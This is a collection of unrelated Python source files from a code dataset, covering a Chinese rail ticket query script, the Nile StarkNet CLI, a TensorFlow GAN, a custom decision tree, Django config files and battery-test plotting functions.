outfile.close()\n\n","sub_path":"soft_beam_decoder.py","file_name":"soft_beam_decoder.py","file_ext":"py","file_size_in_byte":24818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"86444502","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport requests\nfrom prettytable import PrettyTable\n#from docopt import docopt\n\n\"\"\"Train tickets query via command-line.\n Usage:\n tickets [-gdtkz] <from> <to> <date>\n Options:\n -h,--help show this help menu \n -g high-speed rail (G trains)\n -d bullet train (D trains)\n -t express (T trains)\n -k fast (K trains)\n -z direct (Z trains)\n \n Example:\n tickets beijing shanghai 2016-08-25\n\"\"\"\n\"\"\"\ndef parser():\n arguments = docopt(__doc__)\n print(arguments)\n\"\"\"\n \n\ndef get_data(date,from_station,to_station):\n headers = {\"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7\",\n \"Referer\": \"https://kyfw.12306.cn/otn/leftTicket/init\"}\n url = \"https://kyfw.12306.cn/otn/leftTicket/queryT?leftTicketDTO.train_date={0}&leftTicketDTO.from_station={1}&leftTicketDTO.to_station={2}&purpose_codes=ADULT\".format(date,from_station,to_station)\n data = requests.get(url,headers=headers,verify=False)\n data_dict = data.json()\n #print_data(data_dict)\n return data_dict[\"data\"]\n\n\ndef print_data(data_dict):\n print(data_dict[\"data\"][0]) \n #'queryLeftNewDTO' data\n #'buttonTextInfo': '9月2日 8点起售' button text / remark (\"on sale from Sep 2 at 08:00\")\n\n # 'station_train_code': 'G101' train number\n # 'start_station_name': '北京南','to_station_name': '上海虹桥' departure station / arrival station\n # 'start_time': '06:44', 'arrive_time': '12:38' departure time / arrival time\n # 'lishi': '05:54' duration\n # 'swz_num': '17' business class\n # 'zy_num': first class\n # 'ze_num': second class\n # 'rw_num': '--' soft sleeper\n # 'yw_num': '--' hard sleeper\n # 'gr_num': '--' deluxe soft sleeper\n # 'rz_num': soft seat\n # 'yz_num': '--' hard seat\n # 'tz_num': '--' premium class\n # 'wz_num': '有' standing ticket ('有' = available)\n\ndef get_infor(data_list,from_station,to_station,date):\n\n infor_list = ['station_train_code','start_station_name','to_station_name','start_time','arrive_time','lishi','swz_num','tz_num','zy_num',\\\n 'ze_num','rw_num','yw_num','gr_num','rz_num','yz_num','wz_num']\n\n # Chinese column headers, kept verbatim so the table matches the 12306 display\n infor_name = [\"车次\",\"出发站\",\"到达站\",\"出发时间\",\"到达时间\",\"历时\",\"商务座\",\"特等座\",\"一等座\",\"二等座\",\"软卧\",\"硬卧\",\"高级软卧\",\"软座\",\"硬座\",\"无座\",\"备注\"]\n\n table = PrettyTable(infor_name)\n\n for train in data_list:\n num_infor = train[\"queryLeftNewDTO\"]\n row = []\n for infor in infor_list:\n if infor in num_infor:\n row.append(num_infor[infor])\n if infor not in num_infor:\n row.append(\"--\")\n row.append(train['buttonTextInfo'])\n table.add_row(row)\n print(\"\\n\\n\\n\") \n print(\"Here are the trains from {} to {} on {}\".format(from_station,to_station,date))\n print(\"You can choose one to buy!\")\n print(\"\") \n print(table) \n\n \n\n\n\ndef get_station_code(name):\n with open(\"station_code.pkl\",\"rb\") as f:\n dataset = pickle.load(f)\n return dataset[name] \n\n\ndef main(from_station,to_station,date):\n data_list = get_data(date,get_station_code(from_station),get_station_code(to_station))\n get_infor(data_list,from_station,to_station,date)\n\n\nif __name__ == '__main__':\n main(\"长春\",\"北京\",\"2016-09-20\") # Changchun -> Beijing\n \n \n ","sub_path":"train_ticket.py","file_name":"train_ticket.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"613628425","text":"'''\nAuthor: Jim Huang\nDate: 2022-02-16 10:57:54\nLastEditors: Jim Huang\nLastEditTime: 2022-02-16 11:01:03\nDescription: please fill in a description\n'''\nf = open(\"test\",\"w\")\nf.write(\"python\\rwww.python.org\\nwww.magedu.com\\r\\npython3\")\nf.close()\n\nnewlines = [None, \"\",\"\\n\",\"\\r\\n\"]\nfor nl in newlines:\n f = open(\"test\",\"r+\",newline=nl)\n print(f.readlines())\n f.close()","sub_path":"MagePython/Chapter6/6-1-1.py","file_name":"6-1-1.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"624223521","text":"#!/usr/bin/env python\n\"\"\"Nile CLI entry point.\"\"\"\nimport os\nimport shutil\n\nimport click\n\nfrom nile.commands.call import call_or_invoke_command\nfrom nile.commands.compile import compile_command\nfrom nile.commands.deploy import deploy_command\nfrom nile.commands.init import init_command\nfrom nile.commands.install import install_command\nfrom nile.commands.node import node_command\nfrom nile.commands.test import test_command\nfrom nile.commands.version import version_command\nfrom nile.common import BUILD_DIRECTORY, DEPLOYMENTS_FILENAME\n\n\n@click.group()\ndef cli():\n \"\"\"Nile CLI group.\"\"\"\n pass\n\n\n@cli.command()\ndef init():\n \"\"\"Initialize a new Nile project.\"\"\"\n init_command()\n\n\n@cli.command()\ndef install():\n \"\"\"Install Cairo.\"\"\"\n install_command()\n\n\n@cli.command()\n@click.argument(\"artifact\", nargs=1)\n@click.argument(\"arguments\", nargs=-1)\n@click.option(\"--network\", default=\"localhost\")\n@click.option(\"--alias\")\ndef deploy(artifact, 
arguments, network, alias):\n \"\"\"Deploy StarkNet smart contract.\"\"\"\n deploy_command(artifact, arguments, network, alias)\n\n\n@cli.command()\n@click.argument(\"contract_name\", nargs=1)\n@click.argument(\"method\", nargs=1)\n@click.argument(\"params\", nargs=-1)\n@click.option(\"--network\", default=\"localhost\")\ndef invoke(contract_name, method, params, network):\n \"\"\"Invoke functions of StarkNet smart contracts.\"\"\"\n call_or_invoke_command(contract_name, \"invoke\", method, params, network)\n\n\n@cli.command()\n@click.argument(\"contract_name\", nargs=1)\n@click.argument(\"method\", nargs=1)\n@click.argument(\"params\", nargs=-1)\n@click.option(\"--network\", default=\"localhost\")\ndef call(contract_name, method, params, network):\n \"\"\"Call functions of StarkNet smart contracts.\"\"\"\n call_or_invoke_command(contract_name, \"call\", method, params, network)\n\n\n@cli.command()\n@click.argument(\"contracts\", nargs=-1)\ndef test(contracts):\n \"\"\"\n Run cairo test contracts.\n\n $ nile test\n Compiles all test contracts in CONTRACTS_DIRECTORY\n\n $ nile test contracts/MyContract.test.cairo\n Runs tests in MyContract.test.cairo\n\n $ nile test contracts/foo.test.cairo contracts/bar.test.cairo\n Runs tests in foo.test.cairo and bar.test.cairo\n \"\"\"\n test_command(contracts)\n\n\n@cli.command()\n@click.argument(\"contracts\", nargs=-1)\ndef compile(contracts):\n \"\"\"\n Compile cairo contracts.\n\n $ compile.py\n Compiles all contracts in CONTRACTS_DIRECTORY\n\n $ compile.py contracts/MyContract.cairo\n Compiles MyContract.cairo\n\n $ compile.py contracts/foo.cairo contracts/bar.cairo\n Compiles foo.cairo and bar.cairo\n \"\"\"\n compile_command(contracts)\n\n\n@cli.command()\ndef clean():\n \"\"\"Remove default build directory.\"\"\"\n local_deployments_filename = f\"localhost.{DEPLOYMENTS_FILENAME}\"\n\n if os.path.exists(local_deployments_filename):\n print(f\"🚮 Deleting {local_deployments_filename}\")\n os.remove(local_deployments_filename)\n\n if os.path.exists(BUILD_DIRECTORY):\n print(f\"🚮 Deleting {BUILD_DIRECTORY} directory\")\n shutil.rmtree(BUILD_DIRECTORY)\n\n print(\"✨ Workspace clean, keep going!\")\n\n\n@cli.command()\ndef node():\n \"\"\"Start StarkNet local network.\"\"\"\n node_command()\n\n\n@cli.command()\n@click.version_option()\ndef version():\n \"\"\"Print out toolchain version.\"\"\"\n version_command()\n\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"src/nile/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"66311694","text":"import tensorflow as tf\nimport numpy as np\nfrom base_model import BaseModel\nfrom utils import get_random_normal \n\nclass INFO_GAN(BaseModel):\n def __init__(self, gpu_id, learning_rate, loss_type, input_dim, z_dim, ae_h_dim_list, dis_h_dim_list):\n super(INFO_GAN, self).__init__(gpu_id, learning_rate, loss_type, input_dim, z_dim) \n\n self.dec_h_dim_list = [*list(reversed(ae_h_dim_list))]\n self.dis_h_dim_list = dis_h_dim_list\n\n self.build_model()\n\n def build_model(self):\n with tf.device('/gpu:%d' % self.gpu_id):\n ### Placeholder ###\n self.X = tf.placeholder(tf.float32, [None, self.input_dim])\n self.y = tf.placeholder(tf.float32, [None, 10])\n self.k = tf.placeholder(tf.int32)\n self.z = tf.placeholder(tf.float32, [None, self.z_dim])\n self.keep_prob = tf.placeholder(tf.float32)\n \n ### Generating ###\n self.gen_X_logit = self.decoder(tf.concat([self.z,self.y], 1), 
self.dec_h_dim_list, self.input_dim, self.keep_prob, False)\n self.gen_X = tf.nn.sigmoid(self.gen_X_logit)\n self.output = tf.nn.sigmoid(self.gen_X_logit)\n\n ### Discriminating ###\n dis_logit_real = self.discriminator(tf.concat([self.X, self.y], 1), self.dis_h_dim_list, 1, self.keep_prob, False)\n dis_logit_fake = self.discriminator(tf.concat([self.gen_X, self.y], 1), self.dis_h_dim_list, 1, self.keep_prob, True)\n self.dec_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=dis_logit_fake, labels=tf.ones_like(dis_logit_fake))) \n\n self.dis_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=dis_logit_real, labels=tf.ones_like(dis_logit_real))) \n self.dis_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=dis_logit_fake, labels=tf.zeros_like(dis_logit_fake))) \n \n ### Loss ###\n self.dec_loss = self.dec_loss_fake\n self.dis_loss = self.dis_loss_real + self.dis_loss_fake\n\n ### Theta ###\n dec_theta = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='dec')\n dis_theta = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='dis')\n\n ### Solver ###\n self.dec_solver = tf.train.AdamOptimizer(self.learning_rate).minimize(self.dec_loss, var_list=dec_theta)\n self.dis_solver = tf.train.AdamOptimizer(self.learning_rate).minimize(self.dis_loss, var_list=dis_theta)\n\n\n def train_using_info(self, logger, sess, batch_xs, batch_ys, epoch_idx, batch_idx, batch_total, log_flag, keep_prob):\n random_z = get_random_normal(batch_xs.shape[0], self.z_dim)\n\n for i in range(5):\n _, dis_loss_val = sess.run([self.dis_solver, self.dis_loss], feed_dict={self.X: batch_xs, self.y: batch_ys, self.keep_prob: keep_prob, self.z: random_z})\n _, dec_loss_val = sess.run([self.dec_solver, self.dec_loss], feed_dict={self.y: batch_ys, self.keep_prob: keep_prob, self.z: random_z})\n\n total_loss_val = dis_loss_val + dec_loss_val\n if log_flag == True:\n logger.debug('Epoch %.3i, Batch[%.3i/%i], Dis loss : %.4E, Dec loss : %.4E, Train loss: %.4E' % (epoch_idx, batch_idx + 1, batch_total, dis_loss_val, dec_loss_val, total_loss_val))\n\n return total_loss_val\n\n def inference_using_info(self, logger, sess, batch_xs, batch_ys, epoch_idx, batch_idx, batch_total, log_flag, keep_prob):\n random_z = get_random_normal(batch_xs.shape[0], self.z_dim)\n\n dis_loss_val, dec_loss_val = sess.run([self.dis_loss, self.dec_loss], feed_dict={self.X: batch_xs, self.y: batch_ys, self.keep_prob: keep_prob, self.z: random_z})\n\n total_loss_val = dis_loss_val + dec_loss_val\n if log_flag == True:\n logger.debug('Epoch %.3i, Batch[%.3i/%i], Dis loss : %.4E, Dec loss : %.4E, Valid loss: %.4E' % (epoch_idx, batch_idx + 1, batch_total, dis_loss_val, dec_loss_val, total_loss_val))\n\n return total_loss_val\n\n def inference_with_output_using_info(self, logger, sess, batch_xs, batch_ys, epoch_idx, batch_idx, batch_total, log_flag, keep_prob):\n random_z = get_random_normal(batch_xs.shape[0], self.z_dim)\n\n dis_loss_val, dec_loss_val, output_val = sess.run([self.dis_loss, self.dec_loss, self.output], feed_dict={self.X: batch_xs, self.y: batch_ys, self.keep_prob: keep_prob, self.z: random_z})\n\n total_loss_val = dis_loss_val + dec_loss_val\n if log_flag == True:\n logger.debug('Epoch %.3i, Batch[%.3i/%i], Dis loss : %.4E, Dec loss : %.4E, Test loss: %.4E' % (epoch_idx, batch_idx + 1, batch_total, dis_loss_val, dec_loss_val, total_loss_val))\n\n return total_loss_val, 
output_val\n","sub_path":"info_gan.py","file_name":"info_gan.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"400296544","text":"import numpy as np\nfrom sklearn.base import BaseEstimator\n\n__version__ = '0.1'\n\n\ndef _proba(y):\n \"\"\" Array of relative frequencies of the unique values. \"\"\"\n N = len(y)\n _, counts = np.unique(y, return_counts=True)\n return counts / N\n\n\ndef entropy(y):\n \"\"\" A way to measure impurity \"\"\"\n p = _proba(y)\n return (-p * np.log2(p)).sum()\n\n\ndef gini(y):\n \"\"\" A criterion to minimize the probability of misclassification \"\"\"\n p = _proba(y)\n return 1.0 - sum(list(map(lambda x: x * x, p)))\n\n\ndef variance(y):\n return np.var(y)\n\n\ndef mad_median(y):\n median = np.median(y)\n X = len(y)\n return sum(list(map(lambda x: abs(x - median), y))) / X\n\n\nclass DecisionTreeNode:\n def __init__(self, depth=-1):\n self.depth = depth\n self.left = None\n self.right = None\n self.threshold = None\n self.split_feature_index = None\n self.is_leaf = False\n self.prediction = None\n\n self.stats = []\n self.score = np.inf\n\n def make_leaf(self, prediction):\n self.is_leaf = True\n self.prediction = prediction\n\n def __str__(self):\n result = \"\\n\" + \" \" * 3 * self.depth\n if self.is_leaf:\n result += f\"Prediction: {self.prediction}\"\n else:\n result += f\"(Feature: {self.split_feature_index}; Threshold: {self.threshold};)\"\n\n result += \" Score: \" + str(self.score)\n result += \" Stats: \" + str(self.stats)\n\n if not self.is_leaf:\n result += str(self.left)\n result += str(self.right)\n return result\n\n\nclass DecisionTree(BaseEstimator):\n \"\"\"\n Decision Tree\n Parameters\n ----------\n max_depth : int, optional\n Maximum depth of trees\n criterion : string, optional\n Split criterion. 
Valid values are 'entropy', 'gini', 'variance', 'mad_median'.\n min_samples_split : int, optional\n \"\"\"\n\n CRITERION_MAP = {\n 'entropy': entropy,\n 'gini': gini,\n 'variance': variance,\n 'mad_median': mad_median\n }\n\n def __init__(self, max_depth=np.inf, min_samples_split=2,\n criterion='gini', debug=False):\n if max_depth != np.inf and not isinstance(max_depth, int):\n raise ValueError(f\"max_depth must be integer, but (type{max_depth}) given\")\n\n if max_depth < 1:\n raise ValueError(f\"max_depth must be >= 1\")\n\n if not isinstance(min_samples_split, int):\n raise ValueError(f\"min_samples_split must be integer, but (type{min_samples_split}) given\")\n\n if criterion not in DecisionTree.CRITERION_MAP:\n raise ValueError(f\"Unknown criterion given.\", \"Expected one of:\", *DecisionTree.CRITERION_MAP.keys(),\n f\"But {criterion} given.\")\n\n self.max_depth = max_depth\n self.min_samples_split = min_samples_split\n self.criterion = criterion\n self.debug = debug\n\n self.root = None\n\n self.is_classification = criterion in ['entropy', 'gini']\n self.classes = []\n\n def fit(self, X, y):\n\n if len(y.shape) != 1:\n raise ValueError(f\"y must have only 1 dimension\")\n\n if X.shape[0] != y.shape[0]:\n raise ValueError(f\"y and X must have same length\")\n\n if self.is_classification:\n self.classes = sorted(list(set(y)))\n\n self.root = self._build(X, y)\n\n def predict(self, X):\n return np.array([self._estimate(x) for x in X])\n\n def predict_proba(self, X):\n \"\"\"Predict class probabilities of the input samples X.\"\"\"\n if not self.is_classification:\n raise Exception(\"predict_proba is only for classification tree\")\n\n return np.array([self._proba(x) for x in X])\n\n def _build(self, X, y, depth: int = 0) -> DecisionTreeNode:\n if self._stop_criteria(X, y, depth):\n return self._create_leaf(X, y, depth)\n\n node = DecisionTreeNode(depth)\n\n if self.debug:\n classes, counts = np.unique(y, return_counts=True)\n stats = list(zip(classes, counts))\n sorted_stats = sorted(stats, key=lambda x: x[1], reverse=True)\n node.stats = sorted_stats\n\n node.score = self._score(X, y)\n\n split_feature_index, threshold = self._find_best_split(X, y)\n node.split_feature_index = split_feature_index\n node.threshold = threshold\n\n left_mask = X[:, split_feature_index] < threshold\n\n node.left = self._build(X[left_mask], y[left_mask], depth + 1)\n node.right = self._build(X[~left_mask], y[~left_mask], depth + 1)\n return node\n\n def _create_leaf(self, X, y, depth):\n node = DecisionTreeNode(depth)\n\n if self.is_classification:\n classes, counts = np.unique(y, return_counts=True)\n stats = list(zip(classes, counts))\n sorted_stats = sorted(stats, key=lambda x: x[1], reverse=True)\n prediction = sorted_stats[0][0]\n node.stats = sorted_stats\n else:\n prediction = sum(y) / len(y)\n\n node.make_leaf(prediction=prediction)\n node.score = self._score(X, y)\n return node\n\n def _stop_criteria(self, X, y, depth):\n if depth > self.max_depth:\n return True\n\n if len(np.unique(y)) == 1:\n return True\n\n if len(y) < self.min_samples_split:\n return True\n\n return False\n\n def _estimate(self, x):\n current_node = self.root\n while not current_node.is_leaf:\n if x[current_node.split_feature_index] < current_node.threshold:\n current_node = current_node.left\n else:\n current_node = current_node.right\n return current_node.prediction\n\n def _proba(self, x):\n current_node = self.root\n while not current_node.is_leaf:\n if x[current_node.split_feature_index] < current_node.threshold:\n 
current_node = current_node.left\n else:\n current_node = current_node.right\n\n stats = current_node.stats\n\n node_samples_count = sum(map(lambda x: x[1], stats))\n raw_result = list(map(lambda x: (x, 0.0), self.classes))\n\n for class_name, count in stats:\n index = raw_result.index((class_name, 0))\n raw_result[index] = (class_name, count)\n\n result = np.array(list(map(lambda x: x[1], raw_result))) / node_samples_count\n return result\n\n def _find_best_split(self, X, y):\n best_feature_index = None\n best_feature_threshold = None\n best_score = -np.inf\n best_uniformity = 0\n\n for feature_index in range(X.shape[1]):\n feature_column = X[:, feature_index]\n\n for threshold in list(set(feature_column)):\n score, uniformity = self._split_score(X, y, feature_index, threshold)\n if score > best_score and uniformity > best_uniformity:\n best_score = score\n best_feature_index = feature_index\n best_feature_threshold = threshold\n best_uniformity = uniformity\n\n return best_feature_index, best_feature_threshold\n\n def _score(self, X, y):\n fn = DecisionTree.CRITERION_MAP[self.criterion]\n\n score = fn(y)\n return score\n\n def _split_score(self, dataset, y, feature_index, threshold):\n mask = dataset[:, feature_index] < threshold\n\n left = y[mask]\n right = y[~mask]\n\n default_score = -np.inf\n default_uniformity = 0\n\n if len(left) == 0 or len(right) == 0:\n return default_score, default_uniformity\n\n fn = DecisionTree.CRITERION_MAP[self.criterion]\n\n score = fn(y) - len(left) * fn(left) / len(y) - len(right) * fn(right) / len(y)\n\n uniformity = len(left) * len(right)\n\n return score, uniformity\n","sub_path":"ML Course ODS/HW 3 - Tree/Custom tree/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":7898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"379607544","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ds9s', '0019_auto_20141210_2339'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='analysis',\n name='value',\n field=models.DecimalField(max_digits=19, decimal_places=6),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='galaxyfeatures',\n name='value',\n field=models.DecimalField(default=None, max_digits=19, decimal_places=6),\n preserve_default=True,\n ),\n ]\n","sub_path":"ds9s/migrations/0020_auto_20141215_1821.py","file_name":"0020_auto_20141215_1821.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"565491673","text":"from django.conf.urls.defaults import patterns, url\nfrom django.contrib.auth.decorators import login_required\nfrom accounts_web.account.views import CreateAccountView, AccountOverviewView\n\nurlpatterns = patterns('',\n\n# url(r'^$', ListAccountsView.as_view(template_name=\"account/list.html\"), name='new-account'),\n url(r'^$',\n login_required(AccountOverviewView.as_view(template_name=\"account/overview.html\")),\n name='account-overview'),\n url(r'^create/$',\n login_required(CreateAccountView.as_view(template_name=\"account/create.html\")),\n name='account-create'),\n\n)\n","sub_path":"accounts_web/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 
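A minimal usage sketch for the custom DecisionTree defined in decision_tree.py above, assuming the module is importable as decision_tree; the toy dataset and the expected outputs in the comments are illustrative, not part of the original file:

import numpy as np
from decision_tree import DecisionTree  # hypothetical import path for the module above

# Four samples, two features; the label is 1 exactly when feature 0 >= 2.
X = np.array([[1.0, 0.0],
              [1.5, 1.0],
              [3.0, 0.5],
              [3.5, 1.5]])
y = np.array([0, 0, 1, 1])

tree = DecisionTree(max_depth=2, criterion='gini', debug=True)
tree.fit(X, y)

# The tree should split on feature 0 and recover the labels.
print(tree.predict(np.array([[1.2, 0.3], [3.2, 0.7]])))  # expected: [0 1]
print(tree.predict_proba(np.array([[3.2, 0.7]])))        # relative class frequencies at the leaf

With gini as the criterion, _find_best_split lands on feature 0 at threshold 3.0, which separates the two classes exactly, so both leaves are pure and predict_proba returns [0., 1.] for the second query point.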
+{"seq_id":"334529512","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\n\ndef _config(ax, xlabel, ylabel, title=None, loc=None):\n \"\"\"\n Configure labels and appearance of the plot figure.\n \"\"\"\n ax.grid(True, color='0.9')\n ax.set_frame_on(False)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.tick_params(color='0.9')\n if title is not None:\n ax.set_title(title)\n if loc is not None:\n ax.legend(loc=loc)\n\n\ndef plot_hppc_orig(data):\n \"\"\"\n Plot original HPPC data from battery cell test.\n \"\"\"\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.current, 'C0')\n _config(ax, 'Time [s]', 'Current [A]')\n\n fig, ax = plt.subplots()\n ax.plot(data.time, data.voltage, 'C3')\n ax.arrow(15474, 4.06, 0, -0.14, head_width=1000, head_length=0.05, zorder=20)\n _config(ax, 'Time [s]', 'Voltage [V]')\n axins = inset_axes(ax, 2, 2, loc='lower left', borderpad=4)\n axins.plot(data.time, data.voltage, 'C3')\n axins.set_xlim(15420, 15540)\n axins.set_ylim(4.08, 4.21)\n plt.xticks(visible=False)\n plt.yticks(visible=False)\n\n fig, ax1 = plt.subplots(tight_layout=True)\n ax1.plot(data.time, data.current, 'C0')\n ax1.set_xlabel('Time [s]')\n ax1.set_ylabel('Current [A]', color='C0')\n ax1.tick_params('y', colors='C0')\n ax1.set_frame_on(False)\n ax2 = ax1.twinx()\n ax2.plot(data.time, data.voltage, 'C3')\n ax2.set_ylabel('Voltage [V]', color='C3')\n ax2.tick_params('y', colors='C3')\n ax2.set_frame_on(False)\n\n\ndef plot_hppc_proc(data):\n \"\"\"\n Plot processed HPPC data from battery cell test.\n \"\"\"\n ids = data.get_ids()\n idq = data.get_idq()\n idrc = data.get_idrc()\n\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.current, 'C0')\n ax.plot(data.time[ids], data.current[ids], 'x', label='ids')\n ax.plot(data.time[idq], data.current[idq], 'x', label='idq')\n _config(ax, 'Time [s]', 'Current [A]', loc='best')\n\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.voltage, 'C3')\n ax.plot(data.time[ids], data.voltage[ids], 'x', label='ids')\n ax.plot(data.time[idq], data.voltage[idq], 'x', label='idq')\n ax.plot(data.time[idrc[0]], data.voltage[idrc[0]], 'o', alpha=0.8, mew=0, label='id0')\n ax.plot(data.time[idrc[1]], data.voltage[idrc[1]], 'o', alpha=0.8, mew=0, label='id1')\n ax.plot(data.time[idrc[2]], data.voltage[idrc[2]], 'o', alpha=0.8, mew=0, label='id2')\n ax.plot(data.time[idrc[3]], data.voltage[idrc[3]], 'o', alpha=0.8, mew=0, label='id3')\n ax.plot(data.time[idrc[4]], data.voltage[idrc[4]], 'o', alpha=0.8, mew=0, label='id4')\n _config(ax, 'Time [s]', 'Voltage [V]', loc='best')\n\n\ndef plot_discharge_orig(data):\n \"\"\"\n Plot original discharge data from battery cell test.\n \"\"\"\n ids = data.get_ids()\n id0, id1, id2, id3 = data.get_idx()\n\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4.8), tight_layout=True)\n ax1.plot(data.time, data.current, 'C0', label='data')\n ax1.plot(data.time[ids], data.current[ids], 'x', label='ids')\n ax1.plot(data.time[id0], data.current[id0], 'o', alpha=0.8, mew=0, label='id0')\n ax1.plot(data.time[id1], data.current[id1], 'o', alpha=0.8, mew=0, label='id1')\n ax1.plot(data.time[id2], data.current[id2], 'o', alpha=0.8, mew=0, label='id2')\n ax1.plot(data.time[id3], data.current[id3], 'o', alpha=0.8, mew=0, label='id3')\n ax2.plot(data.time, data.voltage, 'C3', label='data')\n ax2.plot(data.time[ids], data.voltage[ids], 'x', label='ids')\n ax2.plot(data.time[id0], data.voltage[id0], 'o', alpha=0.8, mew=0, 
label='id0')\n ax2.plot(data.time[id1], data.voltage[id1], 'o', alpha=0.8, mew=0, label='id1')\n ax2.plot(data.time[id2], data.voltage[id2], 'o', alpha=0.8, mew=0, label='id2')\n ax2.plot(data.time[id3], data.voltage[id3], 'o', alpha=0.8, mew=0, label='id3')\n _config(ax1, 'Time [s]', 'Current [A]', loc='best')\n _config(ax2, 'Time [s]', 'Voltage [V]', loc='best')\n\n fig, ax1 = plt.subplots(tight_layout=True)\n ax1.plot(data.time, data.current, 'C0')\n ax1.set_xlabel('Time [s]')\n ax1.set_ylabel('Current [A]', color='C0')\n ax1.tick_params('y', colors='C0')\n ax1.set_frame_on(False)\n ax2 = ax1.twinx()\n ax2.plot(data.time, data.voltage, 'C3')\n ax2.set_xlabel('Time [s]')\n ax2.set_ylabel('Voltage [V]', color='C3')\n ax2.tick_params('y', colors='C3')\n ax2.set_frame_on(False)\n\n\ndef plot_discharge_proc(data):\n \"\"\"\n Plot processed discharge data from battery cell test.\n \"\"\"\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4.8), tight_layout=True)\n ax1.plot(data.time, data.current, 'C0')\n ax2.plot(data.time, data.voltage, 'C3')\n _config(ax1, 'Time [s]', 'Current [A]')\n _config(ax2, 'Time [s]', 'Voltage [V]')\n\n\ndef plot_temp_orig(data):\n \"\"\"\n Plot original temperature data from battery cell test.\n \"\"\"\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.tc1, label='tc1')\n ax.plot(data.time, data.tc2, label='tc2')\n ax.plot(data.time, data.tc3, label='tc3')\n ax.plot(data.time, data.tc4, label='tc4')\n ax.axvspan(data.time[data.id0], data.time[data.id1], facecolor='0.9', label='section')\n _config(ax, 'Time [s]', 'Temperature [°C]', loc='best')\n\n\ndef plot_temp_proc(data):\n \"\"\"\n Plot processed temperature data from battery cell test.\n \"\"\"\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.tc1, label='tc1')\n ax.plot(data.time, data.tc2, label='tc2')\n ax.plot(data.time, data.tc3, label='tc3')\n ax.plot(data.time, data.tc4, label='tc4')\n _config(ax, 'Time [s]', 'Temperature [°C]', loc='best')\n\n\ndef plot_soc_ocv(data, ocv, soc, i_pts, t_pts, v_pts, z_pts):\n \"\"\"\n Plot SOC and OCV from equivalent circuit model.\n \"\"\"\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.voltage, 'C3', label='data')\n ax.plot(t_pts, v_pts, 'x', label='ocv pts')\n ax.plot(data.time, ocv, '--', label='ocv')\n _config(ax, 'Time [s]', 'Voltage [V]', loc='best')\n\n fig, ax1 = plt.subplots(tight_layout=True)\n ax1.plot(data.time, data.current, 'C9', label='data')\n ax1.plot(t_pts, i_pts, 'x', label='ocv pts')\n ax1.legend(loc='lower left')\n ax1.set_xlabel('Time [s]')\n ax1.set_ylabel('Current [A]', color='C0')\n ax1.tick_params('y', colors='C0')\n ax1.set_frame_on(False)\n ax2 = ax1.twinx()\n ax2.plot(data.time, soc, 'm', label='soc')\n ax2.plot(t_pts, z_pts, 'xC6', label='soc pts')\n ax2.legend(loc='best')\n ax2.set_ylabel('SOC [-]', color='m')\n ax2.tick_params('y', colors='m')\n ax2.set_frame_on(False)\n\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(z_pts, v_pts, 'm', marker='x')\n _config(ax, 'State of charge [-]', 'Open circuit voltage [V]')\n\n\ndef plot_curve_fit(data, ecm):\n \"\"\"\n Plot curve fit for one time constant (OTC) and two time constant (TTC)\n functions. 
